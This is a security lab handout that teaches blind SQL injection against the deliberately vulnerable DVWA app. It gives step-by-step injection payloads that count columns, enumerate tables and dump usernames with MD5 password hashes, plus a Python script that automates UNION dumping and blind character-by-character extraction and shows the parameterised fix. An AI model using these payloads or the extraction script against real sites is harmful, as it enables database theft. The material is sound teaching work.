
LAB 12

BLIND SQL INJECTION

1. Introduction
Blind SQL injection is a very common form of SQL injection attack. Starting from
an optimisation of the blind SQL injection technique for queries that use the
ORDER BY clause, this lab covers methods of exploiting and optimising blind SQL
injection in general, and of exploiting blind SQL injection vulnerabilities in
queries that use the ORDER BY clause in particular, offering a new perspective
on and approach to optimising this attack.

2. Preparation
- A computer running the Windows operating system. The Windows firewall must be
disabled (or Apache allowed through it) so that DVWA can be reached from the
browser.
- phpMyAdmin, for managing the MySQL database:
https://www.phpmyadmin.net/downloads/
- XAMPP, downloaded from:
https://downloadsapachefriends.global.ssl.fastly.net/xampp-files/5.6.31/xampp-win32-5.6.31-0-VC11-installer.exe?from_af=true
- DVWA, downloaded from:
http://www.dvwa.co.uk/
- Browser software (Chrome, Firefox 10.0), 7-Zip, Notepad++.

3. Implementation steps
- Start XAMPP (Apache and MySQL) and browse to http://192.168.100.15/DVWA, where
192.168.100.15 is the IPv4 address of the machine running DVWA. Log in with
user: admin, password: password.
- After logging in, open DVWA Security, choose Low and submit.
- Type: 1 and submit. The page shows First name: admin, Surname: admin (the
normal response for user_id 1).
- Type: 1' and 1=1 # and submit. We again see First name: admin, Surname: admin.
The quote closes the string literal, the injected condition becomes part of the
WHERE clause, and # comments out the rest of the original query.
- Type: 1' and 1=0 # and submit. We see nothing: the injected condition is
false, so no row is returned. These two responses (row shown / nothing shown)
are the true/false oracle that blind injection relies on.
- Type: 1' and 1=0 order by 2 # and submit. We still see nothing: with a false
condition there is no output either way, so this form cannot tell us whether
ORDER BY 2 was accepted.
- Type: 1' and 1=1 order by 1 # and submit. We see the row again (First name:
admin, Surname: admin). ORDER BY n is accepted only when the query selects at
least n columns, so probing with a true condition and increasing n reveals the
number of columns the UNION must match.
- Type: 1' and 1=0 union select 1,2 # and submit. We see First name: 1,
Surname: 2: the query has two columns and both are reflected in the page, so
the Surname field can carry any value we select.
- Type: 1' and 1=0 union select null,substring(@@version,1,1)=4 # and submit.
We see First name: (empty), Surname: 0: the comparison is false.
- Type: 1' and 1=0 union select null,substring(@@version,1,1)=5 # and submit.
Surname: 0 again, so the version string starts with neither 4 nor 5 (XAMPP
5.6.x bundles MariaDB 10.x, whose @@version begins with 1, so =1 would return
1). This single-character comparison is the test that blind injection repeats
for every character position when the value itself cannot be displayed.
- Type: 1' and 1=0 union select null,table_name from
information_schema.tables # and submit. The page lists the name of every table
visible to the database user DVWA connects as.
- Type: 1' and 1=0 union select null,table_name from
information_schema.columns where table_name="user" # and submit. Surname: user.
- Type: 1' and 1=0 union select null,concat(table_name,0x0a,column_name) from
information_schema.columns where table_name="user" # and submit. We see every
column of the table user; among them are columns named User and Password. (The
DVWA application table is users; its first_name and password columns are what
the final query reads.)
- Type: 1' and 1=0 union select null,concat(first_name,0x0a,password) from
users # and submit. The Surname field shows each user's first name and, on the
line below (0x0a is a newline), the MD5 hash of that user's password.
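The steps above can be scripted. The following is an added example, not part of the lab: it models DVWA's Low-level query (`SELECT first_name, last_name FROM users WHERE user_id = '$id'`) against an in-memory sqlite3 database with constructed sample rows (the admin hash is MD5("password"), the value DVWA seeds), so the payloads use sqlite's `--` comment and `substr()` where the lab types `#` and `substring()`. It automates the ORDER BY column-count probe, the UNION dump of the users table, and turns the page's single `substring(@@version,1,1)=5` comparison into a full character-by-character blind extraction driven only by "row shown / nothing shown". The function and table names are this example's own; the parameterised `safe_lookup` shows the fix.

```python
import sqlite3
import string

# Constructed sample rows standing in for DVWA's `users` table; the admin
# hash is MD5("password"), the value DVWA seeds for its admin account.
ROWS = [
    (1, "admin", "admin", "admin", "5f4dcc3b5aa765d61d8327deb882cf99"),
    (2, "Gordon", "Brown", "gordonb", "e99a18c4428cb38d5f260853678922e3"),
]


def make_db():
    """In-memory sqlite3 stand-in for the MariaDB instance XAMPP ships."""
    con = sqlite3.connect(":memory:")
    con.execute(
        "CREATE TABLE users (user_id INTEGER, first_name TEXT, "
        "last_name TEXT, user TEXT, password TEXT)"
    )
    con.executemany("INSERT INTO users VALUES (?, ?, ?, ?, ?)", ROWS)
    return con


def vulnerable_lookup(con, user_id):
    """DVWA 'low' behaviour: the id is concatenated straight into the SQL."""
    sql = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    return con.execute(sql).fetchall()


def safe_lookup(con, user_id):
    """Hardened form: a bound parameter, so the id is only ever data."""
    sql = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return con.execute(sql, (user_id,)).fetchall()


def row_shown(con, payload):
    """Boolean oracle: True when the page would render a First name/Surname
    row, False when it shows nothing or the query errors."""
    try:
        return len(vulnerable_lookup(con, payload)) > 0
    except sqlite3.Error:
        return False


def count_columns(con, limit=10):
    """ORDER BY n is accepted only while n <= number of selected columns,
    so the first n that errors reveals the column count for the UNION."""
    for n in range(1, limit + 1):
        if not row_shown(con, f"1' ORDER BY {n} -- "):
            return n - 1
    return limit


def union_dump(con):
    """The lab's final step: reflect user/password pairs through the two
    displayed columns (sorted, because UNION output order is unspecified)."""
    payload = "1' AND 1=0 UNION SELECT user, password FROM users -- "
    return sorted(vulnerable_lookup(con, payload))


def blind_extract(con, subquery, max_len=64,
                  alphabet=string.digits + string.ascii_letters):
    """Recover the result of `subquery` one character at a time with
    1' AND substr((...), i, 1) = 'c' probes: the blind counterpart of the
    lab's substring(@@version,1,1)=5 test, where only 'row shown' leaks."""
    out = ""
    for i in range(1, max_len + 1):
        for c in alphabet:
            if row_shown(con, f"1' AND substr(({subquery}),{i},1)='{c}' -- "):
                out += c
                break
        else:
            break  # no candidate matched: past the end of the string
    return out


if __name__ == "__main__":
    db = make_db()
    print("columns:", count_columns(db))
    print("dump:", union_dump(db))
    print("blind:", blind_extract(db, "SELECT password FROM users WHERE user='admin'"))
    print("safe:", safe_lookup(db, "1' AND 1=1 -- "))
```

`blind_extract` issues one request per candidate character per position (here 62 candidates at most, 32 positions for an MD5 hash); a binary search on the character code, or the lab's ORDER BY trick, is the usual way to cut that count, while the parameterised `safe_lookup` returns nothing for every payload because the whole input is compared as a single value.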
